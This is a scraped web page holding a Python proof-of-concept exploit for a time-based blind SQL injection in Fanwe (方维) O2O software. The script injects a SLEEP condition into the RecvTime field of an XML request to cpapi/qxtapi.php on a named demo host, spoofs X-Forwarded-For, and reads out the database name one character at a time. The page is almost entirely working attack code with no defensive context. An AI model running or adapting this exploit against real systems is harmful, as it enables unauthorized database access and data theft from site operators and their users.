方维O2O SQLi

#!/usr/bin/env python 2 # -*- coding: utf-8 -*- 3 4 from __future__ import print_function 5 6 import requests 7 8 host = "http://o2odemo.fanwe.net/" 9 10 statement = "IF(ORD(SUBSTRING((DATABASE()), %s, 1)) = %s, SLEEP(1), 0)" 11 characters = list(" !\"#$%&‘()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~") 12 13 def main(): 14 headers = { 15 "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0", 16 "X-Forwarded-For": "221.179.180.156"} 17 18 payload = "<A><Body><Message><SrcMobile>0</SrcMobile><Content>0</Content><RecvTime>0‘ OR %s#</RecvTime></Message></Body></A>" % statement 19 20 info = str() 21 for i in range(1, 42): 22 for c in characters: 23 try: 24 data = payload % (i, ord(c)) 25 r = requests.post(host + "cpapi/qxtapi.php", headers=headers, data=data, timeout=6) 26 except requests.Timeout as e: 27 info += c 28 print("\n[In Progress]: %s" % info) 29 break 30 else: 31 print(">", end="") 32 33 print("\n[Done]: %s" % info) 34 35 if __name__ == "__main__": 36 main()

 

方维O2O SQLi

标签：style   character   http   load   future   exce   div   from   message